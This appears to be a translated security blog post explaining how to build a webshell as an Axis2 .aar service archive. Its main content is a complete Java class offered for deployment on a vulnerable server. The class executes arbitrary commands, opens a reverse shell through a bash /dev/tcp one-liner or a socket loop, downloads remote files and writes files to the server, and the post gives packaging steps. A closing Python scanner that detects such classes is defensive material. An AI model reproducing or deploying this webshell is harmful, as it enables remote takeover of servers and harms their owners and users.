Recompiling an Axis2 service archive to get a webshell

A couple of days ago a friend at work ran into something interesting: an Axis2 parsing vulnerability. While exploiting it he found that the public exp didn't work; the reason turned out to be a version mismatch, so the payload had to be repackaged as an aar archive, and he asked me to rewrite it.

Preparation:

Download and install the Eclipse plugin used to package aar files.

Download location: http://archive.apache.org/dist/axis/axis2/java/core/

Find the matching version number and download the corresponding service plugin; I downloaded the one below:

axis2-eclipse-service-plugin-1.7.6.zip

After the download finishes, unzip it, extract the jar inside, and put it in the dropins directory under the Eclipse installation. Eclipse must be closed while you do this. Once the plugin is in dropins you can open Eclipse.

Writing the exploit code

Create a new Java project.

Create a new class.

Write the webshell code into it.

The code is as follows:

```java
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
import java.net.URL;
import java.net.URLConnection;

public class Utils {

    static String os = System.getProperty("os.name").toLowerCase();

    // Run a command through the platform shell and return what it prints
    public static String exec(String cmd) {
        String result = "";
        try {
            if (cmd != null && cmd.trim().length() > 0) {
                if (os.startsWith("windows")) {
                    cmd = "cmd.exe /c " + cmd;
                } else {
                    cmd = "/bin/sh -c " + cmd;
                }
                InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();

                int read = 0;
                while ((read = inputStream.read()) != -1) {
                    result += (char) read;
                }
            }
        } catch (Exception e) {
            result = e.getMessage();
        }
        return result;
    }

    // Reverse shell: a bash /dev/tcp one-liner on Linux, a socket-driven exec loop elsewhere
    public static String shell(String host, int port) {

        String result = "";
        if (host != null && host.trim().length() > 0 && port > 0) {
            try {
                if (os.startsWith("linux")) {

                    // Write the one-liner to a temporary script, run it, then delete it
                    String name = "wooyun.sh";
                    File file = new File(name);

                    FileWriter writer = new FileWriter(file);
                    writer.write("/bin/bash -i > /dev/tcp/" + host + "/" + port + " 0<&1 2>&1" + "\n");
                    writer.flush();
                    writer.close();
                    Runtime.getRuntime().exec("chmod u+x " + name);
                    Process process = Runtime.getRuntime().exec("bash " + name);
                    process.waitFor();

                    file.delete();
                } else {
                    // Each line received on the socket is executed and its output sent back
                    Socket socket = new Socket(host, port);
                    OutputStream out = socket.getOutputStream();
                    InputStream in = socket.getInputStream();
                    out.write(("whoami:\t" + exec("whoami")).getBytes());
                    int a = 0;
                    byte[] b = new byte[4096];
                    while ((a = in.read(b)) != -1) {
                        out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
                    }
                }
            } catch (Exception e) {
                result = e.getMessage();
            }

        } else {
            result = "host and port are required";
        }

        return result;
    }

    // Write the bundled resource /resource/one.txt to the given path on the server
    public static String upload(String path) {
        String result = "";
        try {
            if (path != null && path.trim().length() > 0) {
                FileOutputStream fos = new FileOutputStream(new File(path));
                InputStream inputStream = new Utils().getClass().getResourceAsStream("/resource/one.txt");
                BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
                String temp = "";
                while (reader.ready()) {
                    temp += reader.readLine() + "\n";
                }
                fos.write(temp.getBytes());
                fos.flush();
                fos.close();
                result = "Upload Success";
            } else {
                result = "Path is required";
            }
        } catch (Exception e) {
            result = e.getMessage();
        }
        return result;
    }

    // Fetch a URL and save the response body to the given path
    public static String download(String url, String path) {
        String result = "";
        try {

            if (url != null && url.trim().length() > 0 && path != null && path.trim().length() > 0) {
                URLConnection conn = new URL(url).openConnection();
                // Ten-minute connect and read timeouts
                conn.setConnectTimeout(10 * 60 * 1000);
                conn.setReadTimeout(10 * 60 * 1000);
                InputStream inputStream = conn.getInputStream();
                int read = 0;
                FileOutputStream fos = new FileOutputStream(new File(path));
                while ((read = inputStream.read()) != -1) {
                    fos.write(read);
                }
                fos.flush();
                fos.close();
            } else {
                result = "Url and path are required";
            }
        } catch (Exception e) {
            result = e.getMessage();
        }
        return result;
    }

    // Filesystem path of the class loader root, useful for locating the deployment directory
    public static String getClassPath() {
        return new Utils().getClass().getClassLoader().getResource("/").getPath();
    }

}
```

Save and build; the compiled class file is generated in the bin directory.

Then, at the top left, go to File -> New -> Other -> Axis2 Wizards.

Select the plugin you just installed, Axis2 Service Archiver.

Enter the full path to the class file.

Then click Next all the way through and you're done.
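For the defending side, the practical check is to audit the service archives actually deployed on an Axis2 instance for classes that carry the strings the Utils class above relies on. This is an added example, not code from the original post: a small Python auditor that opens an .aar (a zip containing META-INF/services.xml plus the service classes), scans every .class entry for a hand-picked indicator list, and reports the hits; the indicator list and the constructed sample archive are my assumptions.

```python
import io
import zipfile

# Constant-pool strings that are unusual in a legitimate Axis2 service class
# but characteristic of the command-execution / reverse-shell class above.
INDICATORS = [
    b"java/lang/Runtime",  # Runtime.getRuntime().exec(...)
    b"cmd.exe /c",
    b"/bin/sh -c",
    b"/dev/tcp/",          # bash reverse-shell idiom
    b"java/net/Socket",
]
CLASS_MAGIC = b"\xca\xfe\xba\xbe"

def scan_class_bytes(data: bytes) -> list[str]:
    """Indicators present in one .class file. Plain substring scan: the
    constant pool stores strings as modified UTF-8, so ASCII appears literally."""
    if not data.startswith(CLASS_MAGIC):
        return []
    return [ind.decode() for ind in INDICATORS if ind in data]

def audit_aar(aar_bytes: bytes) -> dict[str, list[str]]:
    """Map each flagged .class entry of an .aar (a zip with META-INF/services.xml
    plus the service classes) to the indicators found in it."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(aar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                hits = scan_class_bytes(zf.read(name))
                if hits:
                    findings[name] = hits
    return findings

def build_sample_aar() -> bytes:
    """Constructed sample: a benign class plus one carrying the same strings as
    the Utils class. Bodies are fake; only the magic number and strings matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/services.xml", "<serviceGroup/>")
        zf.writestr("Hello.class", CLASS_MAGIC + b"\x00\x00\x00\x34HelloSayHello")
        zf.writestr("Utils.class", CLASS_MAGIC + b"\x00\x00\x00\x34java/lang/Runtime"
                    b"cmd.exe /c /bin/sh -c /dev/tcp/java/net/Socket")
    return buf.getvalue()

if __name__ == "__main__":
    for entry, hits in audit_aar(build_sample_aar()).items():
        print(entry, "->", ", ".join(hits))
```

Run it over the archives in the Axis2 services directory on a live server; a service class that references Runtime and raw sockets deserves a manual look.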
